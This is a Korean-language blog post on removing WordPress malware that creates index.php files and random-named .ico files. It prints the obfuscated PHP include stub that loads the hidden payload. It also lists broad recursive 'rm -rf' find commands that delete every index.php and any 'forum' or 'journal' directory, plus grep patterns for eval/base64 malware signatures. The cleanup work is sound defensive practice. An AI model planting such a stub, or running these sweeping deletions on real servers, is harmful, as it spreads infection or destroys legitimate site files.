www-data index.php 파일이나

.2ec67e7e.ico 이런 ico 파일들이 생성된 경우, wordpress plugin 등에서 유입된 멀웨어를 의심해야한다.

워드프레스가 설치된 서버에는 전체적으로 적용되는 사안이다. 귀찬..

일단 원천봉쇄는 뒤로하고 파일들을 찾아서 제거하자.

index.php 의 내용은 이렇다.

<?php
/*5693b*/

@include "\057ho\155e/.\144d5\0640e\0670.\151co";

/*5693b*/

unphp.net 에서 풀어보면.. ico파일 include하는 형태.. 만든놈 나가 죽었으면..

find -name index.php
find -name index.php -exec rm -rf {} \;

find -name “*.ico” | egrep ‘.[1-z]{8}.ico’
find -name “*.ico” | egrep ‘.[1-z]{8}.ico’ | xargs rm -rf

find -name “*.php” | egrep ‘\.[1-z]{8}.php’
find -name “*.php” | egrep ‘\.[1-z]{8}.php’ | xargs rm -rf

find . -type d -name ‘forum’
find . -type d -name ‘forum’ | xargs rm -rf

find . -type d -name ‘journal’
find . -type d -name ‘journal’ | xargs rm -rf

이런것들 찾아서 제거해주면 되겠는데 php 파일들은 날리기전에 체크한번씩 해보고..

엄한거 지우면 골치아프니까

find . -type f -name ‘*.php’ | xargs grep -l ” *=PHP_VERSION *”
find . -type f -name ‘*.php’ | xargs grep -l ” *Phar::interceptFileFuncs() *”
find . -type f -name ‘*.php’ | xargs grep -l ” *@include *”
find . -type f -name ‘*.php’ | xargs grep -l ” *interceptFileFuncs *”
find . -type f -name ‘*.php’ | xargs grep -l ” *eval *( *gzinflate *( *base64_decode *( *”
find . -type f -name ‘*.php’ | xargs grep -l ” *base64_decode *”
find . -type f -name ‘*.php’ | xargs grep -l ” *function *wscandir *”
find . -type f -name ‘*.php’ | xargs grep -l ” *HTTP/1.0 *404 *Not *Found *”
find . -type f -name ‘*.php’ | xargs grep -l ” *@gzuncompress *”
find . -type f -name ‘*.php’ | xargs grep -l ” *Array *( *) *; *global *”
find . -type f -name ‘*.php’ | xargs grep -l ” *@unserialize *”

One thought on “index.php, .2ec67e7e.ico 파일 생성 malware

답글 남기기

이메일은 공개되지 않습니다. 필수 입력창은 * 로 표시되어 있습니다.